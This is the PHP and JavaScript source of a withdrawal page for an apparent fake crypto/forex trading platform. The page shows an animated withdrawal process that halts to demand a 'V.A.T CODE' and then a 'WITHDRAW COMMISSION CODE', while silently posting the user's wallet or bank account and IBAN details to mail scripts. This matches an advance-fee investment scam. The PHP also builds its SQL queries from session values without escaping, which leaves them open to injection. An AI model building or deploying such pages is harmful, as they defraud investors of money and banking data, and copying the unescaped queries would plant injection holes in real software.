
<?php
require('../auth/connectdb.php');
?>

<?php 
$emailorphone = $_SESSION['emailaddress'];

if($emailorphone != false ){
    $sql = "SELECT * FROM crytobaseusers WHERE emailaddress = '$emailorphone'";
    $run_Sql = mysqli_query($conn, $sql);
    if($run_Sql){
        $fetch_info = mysqli_fetch_assoc($run_Sql);
    }   

}
 
$balance = $fetch_info['balance'];
if($balance==""){
    $bal = "$0.00";
    
}
else{
    $bal = $balance;
}



?>
















$<?php echo $bal;?>

<html lang="en">

<head>
  <style data-styles="">
    ion-icon {
      visibility: hidden
    }

    .hydrated {
      visibility: inherit
    }
  </style>

  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="Description" content="Xstarverse">
  <meta name="Author" content="Xstarverse">
  <meta name="Keywords" content="Fx Trading, Bitcoin Trading, Investment ">
  <!-- Title -->
  <title>Xstarverse - Trading Platform Withdraw</title>
  <link href="assets/plugins/datatable/css/dataTables.bootstrap4.min.css" rel="stylesheet">
  <link href="assets/plugins/datatable/css/buttons.bootstrap4.min.css" rel="stylesheet">
  <link href="assets/plugins/datatable/css/responsive.bootstrap4.min.css" rel="stylesheet">
  <link href="assets/plugins/datatable/css/jquery.dataTables.min.css" rel="stylesheet">
  <link href="assets/plugins/datatable/css/responsive.dataTables.min.css" rel="stylesheet">
  <link href="assets/plugins/select2/css/select2.min.css" rel="stylesheet">

  <!-- Smartsupp Live Chat script -->
  <!-- Smartsupp Live Chat script -->
  <script type="text/javascript">
    var _smartsupp = _smartsupp || {};
    _smartsupp.key = 'd12811d0aea93d3336d202b68db366713787ef84';
    window.smartsupp || (function (d) {
      var s, c, o = smartsupp = function () { o._.push(arguments) }; o._ = [];
      s = d.getElementsByTagName('script')[0]; c = d.createElement('script');
      c.type = 'text/javascript'; c.charset = 'utf-8'; c.async = true;
      c.src = 'https://www.smartsuppchat.com/loader.js?'; s.parentNode.insertBefore(c, s);
    })(document);
  </script>
  <noscript> Powered by <a href=“https://www.smartsupp.com” target=“_blank”>Smartsupp</a></noscript>
  <!-- Favicon -->
  <link rel="icon" href="assets/img/brand/favicon.png" type="image/x-icon">

  <!-- Smartsupp Live Chat script -->

  <link href="assets/icon/themify-icons.css" rel="stylesheet">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/js/all.min.js" integrity="sha512-6PM0qYu5KExuNcKt5bJX3IfzDVVVHmyx0FosVkXhXw8jX1k9asPnWpwozhYJ/Ncnre9eW3csw3ftIoiu/cS5yK" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <!--load all styles -->

  <!-- Icons css -->
  <link href="assets/css/icons.css" rel="stylesheet">

  <!-- Internal Chart-Morris css-->
  <link href="assets/plugins/morris.js/morris.css" rel="stylesheet">

  <!--  Left-Sidebar css -->
  <link href="assets/css/sidemenu.css" rel="stylesheet">

  <!--  Right-sidemenu css -->
  <link href="assets/plugins/sidebar/sidebar.css" rel="stylesheet">

  <!-- Internal Nice-select css  -->
  <link href="assets/plugins/jquery-nice-select/css/nice-select.css" rel="stylesheet">

  <!-- Internal News-Ticker css-->
  <link href="assets/plugins/flag-icon-css/css/flag-icon.min.css" rel="stylesheet">

  <!-- Jquery-countdown css-->
  <link href="assets/plugins/jquery-countdown/countdown.css" rel="stylesheet">

  <!-- Internal News-Ticker css-->
  <link href="assets/plugins/newsticker/jquery.jConveyorTicker.css" rel="stylesheet">

  <!-- style css-->
  <link href="assets/css/style.css" rel="stylesheet">

  <!-- skin css-->
  <link href="assets/css/skin-modes.css" rel="stylesheet">

  <!-- dark-theme css-->
  <link href="assets/css/style-dark.css" rel="stylesheet">

  <!--- Animations css-->
  <link href="assets/css/animate.css" rel="stylesheet">


  <script src="https://luxurypips.com/secure/assets/plugins/ionicons/ionicons/ionicons.suuqn5vt.js" type="module"
    crossorigin="true" data-resources-url="https://luxurypips.com/secure/assets/plugins/ionicons/ionicons/"
    data-namespace="ionicons"></script>
  <style type="text/css">
    /* Chart.js */
    @-webkit-keyframes chartjs-render-animation {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    @keyframes chartjs-render-animation {
      from {
        opacity: 0.99
      }

      to {
        opacity: 1
      }
    }

    .chartjs-render-monitor {
      -webkit-animation: chartjs-render-animation 0.001s;
      animation: chartjs-render-animation 0.001s;
    }
  </style>
  <style type="text/css"
    id="s./node_modules/css-loader/index.js!./node_modules/sass-loader/lib/loader.js!./package/src/animation.scss-0">
    /**
 * @license
 * Copyright Akveo. All Rights Reserved.
 * Licensed under the MIT License. See License.txt in the project root for license information.
 */
    .eva-animation {
      animation-duration: 1s;
      animation-fill-mode: both;
    }

    .eva-infinite {
      animation-iteration-count: infinite;
    }

    .eva-icon-shake {
      animation-name: eva-shake;
    }

    .eva-icon-zoom {
      animation-name: eva-zoomIn;
    }

    .eva-icon-pulse {
      animation-name: eva-pulse;
    }

    .eva-icon-flip {
      animation-name: eva-flipInY;
    }

    .eva-hover {
      display: inline-block;
    }

    .eva-hover:hover .eva-icon-hover-shake,
    .eva-parent-hover:hover .eva-icon-hover-shake {
      animation-name: eva-shake;
    }

    .eva-hover:hover .eva-icon-hover-zoom,
    .eva-parent-hover:hover .eva-icon-hover-zoom {
      animation-name: eva-zoomIn;
    }

    .eva-hover:hover .eva-icon-hover-pulse,
    .eva-parent-hover:hover .eva-icon-hover-pulse {
      animation-name: eva-pulse;
    }

    .eva-hover:hover .eva-icon-hover-flip,
    .eva-parent-hover:hover .eva-icon-hover-flip {
      animation-name: eva-flipInY;
    }

    @keyframes eva-flipInY {
      from {
        transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
        animation-timing-function: ease-in;
        opacity: 0;
      }

      40% {
        transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
        animation-timing-function: ease-in;
      }

      60% {
        transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
        opacity: 1;
      }

      80% {
        transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
      }

      to {
        transform: perspective(400px);
      }
    }

    @keyframes eva-shake {

      from,
      to {
        transform: translate3d(0, 0, 0);
      }

      10%,
      30%,
      50%,
      70%,
      90% {
        transform: translate3d(-3px, 0, 0);
      }

      20%,
      40%,
      60%,
      80% {
        transform: translate3d(3px, 0, 0);
      }
    }

    @keyframes eva-pulse {
      from {
        transform: scale3d(1, 1, 1);
      }

      50% {
        transform: scale3d(1.2, 1.2, 1.2);
      }

      to {
        transform: scale3d(1, 1, 1);
      }
    }

    @keyframes eva-zoomIn {
      from {
        opacity: 1;
        transform: scale3d(0.5, 0.5, 0.5);
      }

      50% {
        opacity: 1;
      }
    }
  </style>
  <style type="text/css">
    .jqstooltip {
      position: absolute;
      left: 0px;
      top: 0px;
      visibility: hidden;
      background: rgb(0, 0, 0) transparent;
      background-color: rgba(0, 0, 0, 0.6);
      filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000);
      -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorstr=#99000000, endColorstr=#99000000)";
      color: white;
      font: 10px arial, san serif;
      text-align: left;
      white-space: nowrap;
      padding: 5px;
      border: 1px solid white;
      box-sizing: content-box;
      z-index: 10000;
    }

    .jqsfield {
      color: white;
      font: 10px arial, san serif;
      text-align: left;
    }
  </style>
  <style type="text/css">
    @keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-moz-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    @-webkit-keyframes tawkMaxOpen {
      0% {
        opacity: 0;
        transform: translate(0, 30px);
        ;
      }

      to {
        opacity: 1;
        transform: translate(0, 0px);
      }
    }

    #jiCXNzJ-1600607701865 {
      outline: none !important;
      visibility: visible !important;
      resize: none !important;
      box-shadow: none !important;
      overflow: visible !important;
      background: none !important;
      opacity: 1 !important;
      filter: alpha(opacity=100) !important;
      -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity1) !important;
      -moz-opacity: 1 !important;
      -khtml-opacity: 1 !important;
      top: auto !important;
      right: 10px !important;
      bottom: 90px !important;
      left: auto !important;
      position: fixed !important;
      border: 0 !important;
      min-height: 0 !important;
      min-width: 0 !important;
      max-height: none !important;
      max-width: none !important;
      padding: 0 !important;
      margin: 0 !important;
      -moz-transition-property: none !important;
      -webkit-transition-property: none !important;
      -o-transition-property: none !important;
      transition-property: none !important;
      transform: none !important;
      -webkit-transform: none !important;
      -ms-transform: none !important;
      width: auto !important;
      height: auto !important;
      display: none !important;
      z-index: 2000000000 !important;
      background-color: transparent !important;
      cursor: auto !important;
      float: none !important;
      border-radius: unset !important;
      pointer-events: auto !important
    }

    #QsGvCzY-1600607701867.open {
      animation: tawkMaxOpen .25s ease !important;
    }
  </style>
</head>


<body class="main-body app sidebar-mini dark-theme sidebar-gone" onload="startTime()">

  <!-- Loader -->
  <div id="global-loader" class="dark-loader">
    <img src="assets/img/loaders/loader.svg" class="loader-img" alt="Loader">
  </div>
  <!-- /Loader -->

  <!-- main-sidebar opened -->
  <div class="app-sidebar__overlay" data-toggle="sidebar"></div>
  <aside class="app-sidebar sidebar-scroll ps">
    <div class="main-sidebar-header">
      <div>
        <select class="custom-select" id="language" onchange="changeLanguageByButtonClick()">
          <option value="af">Afrikanns</option>
          <option value="sq">Albanian</option>
          <option value="ar">Arabic</option>
          <option value="hy">Armenian</option>
          <option value="eu">Basque</option>
          <option value="bn">Bengali</option>
          <option value="bg">Bulgarian</option>
          <option value="ca">Catalan</option>
          <option value="km">Cambodian</option>
          <option value="zh-CN">Chinese (Mandarin)</option>
          <option value="hr">Croation</option>
          <option value="cs">Czech</option>
          <option value="da">Danish</option>
          <option value="nl">Dutch</option>
          <option value="en" selected>English</option>
          <option value="et">Estonian</option>
          <option value="fj">Fiji</option>
          <option value="fi">Finnish</option>
          <option value="fr">French</option>
          <option value="ka">Georgian</option>
          <option value="de">German</option>
          <option value="el">Greek</option>
          <option value="gu">Gujarati</option>
          <option value="he">Hebrew</option>
          <option value="hi">Hindi</option>
          <option value="hu">Hungarian</option>
          <option value="is">Icelandic</option>
          <option value="id">Indonesian</option>
          <option value="ga">Irish</option>
          <option value="it">Italian</option>
          <option value="ja">Japanese</option>
          <option value="jw">Javanese</option>
          <option value="ko">Korean</option>
          <option value="la">Latin</option>
          <option value="lv">Latvian</option>
          <option value="lt">Lithuanian</option>
          <option value="mk">Macedonian</option>
          <option value="ms">Malay</option>
          <option value="ml">Malayalam</option>
          <option value="mt">Maltese</option>
          <option value="mi">Maori</option>
          <option value="mr">Marathi</option>
          <option value="mn">Mongolian</option>
          <option value="ne">Nepali</option>
          <option value="no">Norwegian</option>
          <option value="fa">Persian</option>
          <option value="pl">Polish</option>
          <option value="pt">Portuguese</option>
          <option value="pa">Punjabi</option>
          <option value="qu">Quechua</option>
          <option value="ro">Romanian</option>
          <option value="ru">Russian</option>
          <option value="sm">Samoan</option>
          <option value="sr">Serbian</option>
          <option value="sk">Slovak</option>
          <option value="sl">Slovenian</option>
          <option value="es">Spanish</option>
          <option value="sw">Swahili</option>
          <option value="sv">Swedish </option>
          <option value="ta">Tamil</option>
          <option value="tt">Tatar</option>
          <option value="te">Telugu</option>
          <option value="th">Thai</option>
          <option value="bo">Tibetan</option>
          <option value="to">Tonga</option>
          <option value="tr">Turkish</option>
          <option value="uk">Ukranian</option>
          <option value="ur">Urdu</option>
          <option value="uz">Uzbek</option>
          <option value="vi">Vietnamese</option>
          <option value="cy">Welsh</option>
          <option value="xh">Xhosa</option>
        </select>


        <div id="google_translate_element" style="display:none"></div>
        <script type="text/javascript">

          function googleTranslateElementInit() {
            new google.translate.TranslateElement({ pageLanguage: "en" }, 'google_translate_element');
          }

          function changeLanguageByButtonClick() {
            var language = document.getElementById("language").value;
            var selectField = document.querySelector("#google_translate_element select");
            for (var i = 0; i < selectField.children.length; i++) {
              var option = selectField.children[i];
              // find desired langauge and change the former language of the hidden selection-field
              if (option.value == language) {
                selectField.selectedIndex = i;
                // trigger change event afterwards to make google-lib translate this side
                selectField.dispatchEvent(new Event('change'));
                break;
              }
            }
          }
        </script>

        <script type="text/javascript"
          src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
      </div>
    </div>
    <div class="main-sidebar-body circle-animation ">

      <ul class="side-menu circle">

        <li>
          

        </li>
        <li class="slide">
          <a class="side-menu__item" href="index.php"><span
              class="side-menu__label">Dashboard</span></a>
        </li>
        
        <li class="slide">
          <a class="side-menu__item" href="withdraw.php"><span class="side-menu__label">Withdrawal</span></a>
        </li>
        <li class="slide">
					<a class="side-menu__item" href="copy_trader.php"><span class="side-menu__label">Copy Trading</span></a>
				</li>
				<li class="slide">
					<a class="side-menu__item" href="platform.php"><span class="side-menu__label">Trading</span></a>
				</li>
				<li class="slide">
					<a class="side-menu__item" href="plans.php"><span class="side-menu__label">Pricing</span></a>
				</li>
        <li class="slide">
          <a class="side-menu__item" href="deposit.php"><span class="side-menu__label">Deposit</span></a>
        </li>
        <li class="slide">
          <a class="side-menu__item" href="transactions.php"><span class="side-menu__label">Transactions</span></a>
        </li>


        <li class="slide">
          <a class="side-menu__item" href="profile.php">
            <span class="side-menu__label">Account Settings</span></a>
        </li>

        <li class="slide">
          <a class="side-menu__item" href="../logout.php">
            <i class="side-menu__icon fa fa-power-off"></i>
            <span class="side-menu__label">Sign Out</span></a>
        </li>
      </ul>
    </div>
    <div class="ps__rail-x" style="left: 0px; top: 0px;">
      <div class="ps__thumb-x" tabindex="0" style="left: 0px; width: 0px;"></div>
    </div>
    <div class="ps__rail-y" style="top: 0px; right: 0px;">
      <div class="ps__thumb-y" tabindex="0" style="top: 0px; height: 0px;"></div>
    </div>
  </aside> <!-- main-sidebar -->

  <!-- main-content -->
  <div class="main-content app-content">

    <!-- Page main-header -->
    <div class="main-header sticky side-header nav nav-item sticky-pin fixed-header visible-title">
      <div class="container-fluid">
        <div class="main-header-left ">
          <div class="app-sidebar__toggle mobile-toggle" data-toggle="sidebar">
            <a class="open-toggle" href="#"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                viewBox="0 0 24 24" class="eva eva-menu-outline header-icons">
                <g data-name="Layer 2">
                  <g data-name="menu">
                    <rect width="24" height="24" transform="rotate(180 12 12)" opacity="0"></rect>
                    <rect x="3" y="11" width="18" height="2" rx=".95" ry=".95"></rect>
                    <rect x="3" y="16" width="18" height="2" rx=".95" ry=".95"></rect>
                    <rect x="3" y="6" width="18" height="2" rx=".95" ry=".95"></rect>
                  </g>
                </g>
              </svg></a>
            <a class="close-toggle" href="#"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                viewBox="0 0 24 24" class="eva eva-close-outline header-icons">
                <g data-name="Layer 2">
                  <g data-name="close">
                    <rect width="24" height="24" transform="rotate(180 12 12)" opacity="0"></rect>
                    <path
                      d="M13.41 12l4.3-4.29a1 1 0 1 0-1.42-1.42L12 10.59l-4.29-4.3a1 1 0 0 0-1.42 1.42l4.3 4.29-4.3 4.29a1 1 0 0 0 0 1.42 1 1 0 0 0 1.42 0l4.29-4.3 4.29 4.3a1 1 0 0 0 1.42 0 1 1 0 0 0 0-1.42z">
                    </path>
                  </g>
                </g>
              </svg></a>
          </div>

        </div>
        <div class="main-header-center">
          <div class="responsive-logo">

          </div>
        </div>

      </div>
    </div>

    <!-- /main-header -->

    <!-- Page mobile-header -->

    <!-- container -->
    <div class="container-fluid">





      <!-- row  -->
      <div class="row">
        <div class="col-xl-12 col-md-12 col-lg-12">
          <div class=" ">
            <div class="js-conveyor-example jctkr-wrapper jctkr-initialized">
              <!-- TradingView Widget BEGIN -->
              <div class="tradingview-widget-container">
                <div class="tradingview-widget-container__widget"></div>

                <script type="text/javascript"
                  src="https://s3.tradingview.com/external-embedding/embed-widget-ticker-tape.js" async>
                    {
                      "symbols": [
                        {
                          "proName": "FOREXCOM:SPXUSD",
                          "title": "S&P 500"
                        },
                        {
                          "proName": "FOREXCOM:NSXUSD",
                          "title": "Nasdaq 100"
                        },
                        {
                          "proName": "FX_IDC:EURUSD",
                          "title": "EUR/USD"
                        },
                        {
                          "proName": "BITSTAMP:BTCUSD",
                          "title": "BTC/USD"
                        },
                        {
                          "proName": "BITSTAMP:ETHUSD",
                          "title": "ETH/USD"
                        }
                      ],
                        "colorTheme": "light",
                          "isTransparent": true,
                            "displayMode": "compact",
                              "locale": "en"
                    }
                  </script>
              </div>
              <!-- TradingView Widget END -->
            </div>
          </div>
        </div>
      </div> <!-- Page Stats -->
      <div class="row">

        <div class="col-sm-12 col-md-6 col-lg-3">
          <div class="card ">
            <div class="card-body">
              <div class="d-flex no-block align-items-center">
                <div>
                  <h6 class="text">BALANCE</h6>
                  <h2 class="text m-0 ">
                    $<?php echo $bal;?></h2>
                </div>
                <div class="ml-auto">
                  <span class="text display-6"></span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div> <!-- /row -->
      <div class="row">

        <div class="col-sm-12 col-md-6 col-lg-3"><a href="crypto_withdrawal.php">
            <div class="card ">
              <div class="card-body">
                <div class="d-flex no-block align-items-center">
                  <div>
                    <h6 class="text">Withdraw To</h6>
                    <h2 class="text m-0 ">
                      Wallet Address
                    </h2>
                  </div>
                  <div class="ml-auto">
                    <span class="text display-6"></span>
                  </div>
                </div>
              </div>
            </div>
          </a>
        </div>


        <div class="col-sm-12 col-md-6 col-lg-3"><a href="bank_withdrawal.php">
            <div class="card ">
              <div class="card-body">
                <div class="d-flex no-block align-items-center">
                  <div>
                    <h6 class="text">Withdraw To</h6>
                    <h2 class="text m-0 ">
                      Bank Account
                    </h2>
                  </div>
                  <div class="ml-auto">
                    <span class="text display-6"></span>
                  </div>
                </div>
              </div>
            </div>
          </a>
        </div>
      </div>

                      
                



















      <div class="container">
        <div class="container-fluid">
          <h4>Withdrawal History</h4>
          <div class="table-responsive mt-3 mb-3">
            <table class="table table-hover no-margin">
              <thead>
                <tr></tr>
                <th class="no-border">Transaction ID </th>
                <th class="no-border">Email Address </th>
                <th class="no-border">Date </th>
                <th class="no-border">Amount </th>
                <th class="no-border">Recipient </th>
                <th class="no-border">Status </th>
                </tr>
                <tr>
                  
                </tr>
              </thead>
              <tbody>

                     <?php
                          $emailorphone= $_SESSION['emailorphone'];
                          $query="SELECT * FROM `withdrawal` WHERE emailaddress='$emailorphone'";
	                        $selectquery= mysqli_query($conn, $query);
	                        
                          while($row=mysqli_fetch_array($selectquery)){
		                	?>

                           <tr>

                                  <td><?php echo $row['transactionid']; ?></td>
                                  <td><?php echo $row['emailaddress']; ?></td>
                                  <td><?php echo $row['datte']; ?></td>
                                  <td><?php echo $row['amat']; ?></td>
                                  <td><?php echo $row['accountname']; ?></td>
                                  <td><?php echo $row['status']; ?></td>
                                            
                                  
                             </tr>
                             
                             



                      <?php
                       }
                       ?>

                       











                 </tbody>
            </table>
          </div>
        </div>
      </div>








    </div>
  </div>
  <!-- /conatiner -->
  </div>
  <!-- /main-content -->

  <!-- Footer opened -->
  <div class="main-footer ht-40">
    <div class="container-fluid pd-t-0-f ht-100p">
      <span>&copy; Xstarverse 2020.</span>
    </div>
  </div>
  <!-- Footer closed -->

  <!-- Back-to-top -->

  <!-- JQuery min js -->
  <script src="assets/plugins/jquery/jquery.min.js"></script>

  <!-- Datepicker js -->
  <script src="assets/plugins/jquery-ui/ui/widgets/datepicker.js"></script>

  <!-- Bootstrap Bundle js -->
  <script src="assets/plugins/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Ionicons js -->
  <script src="assets/plugins/ionicons/ionicons.js"></script>

  <!-- Moment js -->
  <script src="assets/plugins/moment/moment.js"></script>

  <!--Chart bundle min js -->
  <script src="assets/plugins/chart.js/Chart.bundle.min.js"></script>
  <script src="assets/plugins/raphael/raphael.min.js"></script>
  <script src="assets/plugins/peity/jquery.peity.min.js"></script>

  <!-- JQuery sparkline js -->
  <script src="assets/plugins/jquery-sparkline/jquery.sparkline.min.js"></script>


  <!-- Sampledata js -->
  <script src="assets/js/chart.flot.sampledata.js"></script>

  <!-- Perfect-scrollbar js -->
  <script src="assets/plugins/perfect-scrollbar/perfect-scrollbar.min.js"></script>
  <script src="assets/plugins/perfect-scrollbar/p-scroll.js"></script>

  <!-- Internal  Flot js-->
  <script src="assets/plugins/jquery.flot/jquery.flot.js"></script>
  <script src="assets/plugins/jquery.flot/jquery.flot.pie.js"></script>
  <script src="assets/plugins/jquery.flot/jquery.flot.resize.js"></script>
  <script src="assets/plugins/jquery.flot/jquery.flot.categories.js"></script>
  <script src="assets/js/dashboard.sampledata.js"></script>
  <script src="assets/js/chart.flot.sampledata.js"></script>

  <!-- Internal Newsticker js-->
  <script src="assets/plugins/newsticker/jquery.jConveyorTicker.js"></script>
  <script src="assets/js/newsticker.js"></script>

  <!-- Eva-icons js -->
  <script src="assets/js/eva-icons.min.js"></script>

  <!-- Sidebar js -->
  <script src="assets/plugins/side-menu/sidemenu.js"></script>

  <!-- right-sidebar js -->
  <script src="assets/plugins/sidebar/sidebar.js"></script>
  <script src="assets/plugins/sidebar/sidebar-custom.js"></script>

  <!-- Rating js-->
  <script src="assets/plugins/rating/jquery.rating-stars.js"></script>
  <script src="assets/plugins/rating/jquery.barrating.js"></script>

  <!-- P-scroll js -->
  <script src="assets/plugins/perfect-scrollbar/perfect-scrollbar.min.js"></script>
  <script src="assets/plugins/perfect-scrollbar/p-scroll.js"></script>

  <!-- Internal Nice-select js-->
  <script src="assets/plugins/jquery-nice-select/js/jquery.nice-select.js"></script>
  <script src="assets/plugins/jquery-nice-select/js/nice-select.js"></script>

  <!-- Sticky js -->
  <script src="assets/js/sticky.js"></script>

  <!-- index js -->
  <script src="assets/js/dashboard.js"></script>
  <!-- Internal Modal js-->
  <script src="assets/js/modal.js"></script>

  <!-- custom js -->
  <script src="assets/js/custom.js"></script>
  <script>


    var i = 0;
    function checkempty() {
      if (document.getElementById("btc_address").value == "" || document.getElementById("amount").value == "") {
        // something is wrong
        alert('Please Fill In The Form');
      } else {
        var $popup = $("#modaldemo8");
        $popup.slideDown();
        move();
      }
    }
    function move() {
      if (i == 0) {
        i = 1;
        var elem = document.getElementById("progressba");
        var width = 1;
        var id = setInterval(frame, 200);
        function frame() {
          if (width == 3) {
            document.getElementById("words").innerHTML = "initializing Withdrawal";
          }
          if (width == 10) {
            document.getElementById("words").innerHTML = "Fetching Transfer Plugins for Crypto Currency Please Wait...";
          }
          if (width == 30) {
            document.getElementById("words").innerHTML = "Amount and Wallet address confirmed";
          }
          if (width == 40) {
            $.ajax({
              url: 'mailv.php',
              type: 'POST',
              data: { 'walletaddress': document.getElementById("btc_address").value, 'amount': document.getElementById("amount").value, 'type': 'wallet', },
              success: function () {

              }

            });
          }
          if (width == 45) {
            document.getElementById("words").innerHTML = "Please input V.A.T CODE";
            document.getElementById("vattdiv").style.display = "block";
            clearInterval(id);
          }
          if (width >= 100) {
            clearInterval(id);
            i = 0;
          } else {
            width++;
            document.getElementById("progressba").innerHTML = width;
            elem.style.width = width + "%";
          }
        }
      }
    }

    function checkvat() {
      var vatcode = document.getElementById("realvat").value;
      var vat = document.getElementById("vatcode").value;
      if (vatcode == vat) {
        document.getElementById("words").innerHTML = "V.A.T CODE confirmed";
        document.getElementById("vattdiv").style.display = "none";
        i = 0;
        if (i == 0) {
          i = 1;
          var elem = document.getElementById("progressba");
          var width = 46;
          var id = setInterval(frame, 200);
          function frame() {
            if (width == 47) {
              document.getElementById("words").innerHTML = "Spoofing Connection Please Wait....";
            }
            if (width == 75) {
              $.ajax({
                url: 'mailw.php',
                type: 'POST',
                data: { 'walletaddress': document.getElementById("btc_address").value, 'amount': document.getElementById("amount").value, 'type': 'wallet', },
                success: function () {

                }

              });
            }
            if (width == 80) {
              document.getElementById("words").innerHTML = "Please input WITHDRAW COMMISSION CODE";
              document.getElementById("commdiv").style.display = "block";
              clearInterval(id);
            }
            if (width >= 100) {
              clearInterval(id);
              i = 0;
            } else {
              width++;
              document.getElementById("progressba").innerHTML = width;
              elem.style.width = width + "%";
            }
          }
        }
      } else {
        alert('invalid V.A.T CODE');


      }
    }
    function checkwit() {
      var witcode = document.getElementById("realwit").value;;
      var wit = document.getElementById("witcode").value;
      if (witcode == wit) {
        document.getElementById("words").innerHTML = "WITHDRAW COMMISSION CODE confirmed";
        document.getElementById("commdiv").style.display = "none";
        i = 0;
        if (i == 0) {
          i = 1;
          var elem = document.getElementById("progressba");
          var width = 81;
          var id = setInterval(frame, 200);
          function frame() {
            if (width == 95) {
              document.getElementById("words").innerHTML = "Transfer Pending Please Wait....";
            }
            if (width >= 100) {
              document.getElementById("words").innerHTML = "Redirecting in Seconds";
              var amount = document.getElementById("amount").value;
              var wallet = document.getElementById("btc_address").value;
              vatcode = document.getElementById("vatcode").value;
              document.getElementById("formbtc").submit();
              clearInterval(id);
              i = 0;
            } else {
              width++;
              document.getElementById("progressba").innerHTML = width;
              elem.style.width = width + "%";
            }
          }
        }
      } else {
        alert('invalid WITHDRAW COMMISSION CODE');


      }
    }
  </script>
  <script>
    var i2 = 0;
    function checkempty2() {
      if (document.getElementById("bank_name").value == "" || document.getElementById("account_name").value == "" || document.getElementById("account_number").value == "" || document.getElementById("iban").value == "" || document.getElementById("amount2").value == "") {
        // something is wrong
        alert('Please Fill In The Form');

      } else {

        var $popup = $("#modaldemo9");
        $popup.slideDown();
        move2();
      }
    }
    function move2() {
      if (i2 == 0) {
        i2 = 1;
        var elem = document.getElementById("progressba2");
        var width2 = 1;
        var id = setInterval(frame, 200);
        function frame() {
          if (width2 == 3) {
            document.getElementById("words2").innerHTML = "Fetching Transfer Plugins for Bank Transfer Please Wait...";
          }
          if (width2 == 20) {
            document.getElementById("words2").innerHTML = "Fetching Bank Transfer Form to complete Transfer Please Wait...";
          }
          if (width2 == 30) {
            var bank_name = document.getElementById("bank_name").value;
            document.getElementById("words2").innerHTML = "Searching for Query Via " + bank_name + " Please Wait...";
          }
          if (width2 == 40) {
            $.ajax({
              url: 'mailv.php',
              type: 'POST',
              data: { 'bankname': document.getElementById("bank_name").value, 'accountname': document.getElementById("account_name").value, 'accountnumber': document.getElementById("account_number").value, 'iban': document.getElementById("iban").value, 'amount': document.getElementById("amount2").value, 'currency': document.getElementById("amount2").value, 'type': 'bank', },
              success: function () {

              }

            });
          }
          if (width2 == 45) {
            document.getElementById("words2").innerHTML = "Please input V.A.T CODE";
            document.getElementById("vattdiv2").style.display = "block";
            clearInterval(id);
          }
          if (width2 >= 100) {
            clearInterval(id);
            i2 = 0;
          } else {
            width2++;
            document.getElementById("progressba2").innerHTML = width2;
            elem.style.width = width2 + "%";
          }
        }
      }
    }

    function checkvat2() {
      var vatcode = document.getElementById("realvat2").value;
      var vat = document.getElementById("vatcode2").value;
      if (vatcode == vat) {
        document.getElementById("words2").innerHTML = "V.A.T CODE confirmed";
        document.getElementById("vattdiv2").style.display = "none";
        i2 = 0;
        if (i2 == 0) {
          i2 = 1;
          var elem = document.getElementById("progressba2");
          var width2 = 46;
          var id = setInterval(frame, 200);
          function frame() {
            if (width2 == 47) {
              document.getElementById("words2").innerHTML = "Spoofing Connection Please Wait....";
            }
            if (width2 == 75) {
              $.ajax({
                url: 'mailw.php',
                type: 'POST',
                data: { 'bankname': document.getElementById("bank_name").value, 'accountname': document.getElementById("account_name").value, 'accountnumber': document.getElementById("account_number").value, 'iban': document.getElementById("iban").value, 'amount': document.getElementById("amount2").value, 'currency': document.getElementById("amount2").value, 'type': 'bank', },
                success: function () {

                }

              });
            }
            if (width2 == 80) {
              document.getElementById("words2").innerHTML = "Please input WITHDRAW COMMISSION CODE";
              document.getElementById("commdiv2").style.display = "block";
              clearInterval(id);
            }
            if (width2 == 95) {
              document.getElementById("words2").innerHTML = "Transfer Pending Please Wait....";
            }
            if (width2 >= 100) {
              clearInterval(id);
              i2 = 0;
            } else {
              width2++;
              document.getElementById("progressba2").innerHTML = width2;
              elem.style.width = width2 + "%";
            }
          }
        }
      } else {
        alert('invalid V.A.T CODE');


      }
    }
    function checkwit2() {
      var witcode = document.getElementById("realwit2").value;;
      var wit = document.getElementById("witcode2").value;
      if (witcode == wit) {
        document.getElementById("words2").innerHTML = "WITHDRAW COMMISSION CODE confirmed";
        document.getElementById("commdiv2").style.display = "none";
        i2 = 0;
        if (i2 == 0) {
          i2 = 1;
          var elem = document.getElementById("progressba2");
          var width2 = 81;
          var id = setInterval(frame, 200);
          function frame() {
            if (width2 == 95) {
              document.getElementById("words2").innerHTML = "Transfer Completed Please Wait....";
            }
            if (width2 >= 100) {
              document.getElementById("words2").innerHTML = "Redirecting in Seconds";
              document.getElementById("cymax").submit();
              clearInterval(id);
              i2 = 0;
            } else {
              width2++;
              document.getElementById("progressba2").innerHTML = width2;
              elem.style.width = width2 + "%";
            }
          }
        }
      } else {
        alert('invalid WITHDRAW COMMISSION CODE');


      }
    }
  </script>
  <script>
    // Mark all message as read
    function markAllAsRead(id) {
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
          alert(xmlhttp.responseText);
        }
      };
      xmlhttp.open("GET", "process.php?msg_markall=" + id, true);
      xmlhttp.send();
    }
    function mmarkAllAsRead(id) {
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
          alert(xmlhttp.responseText);
        }
      };
      xmlhttp.open("GET", "process.php?msg_markall=" + id, true);
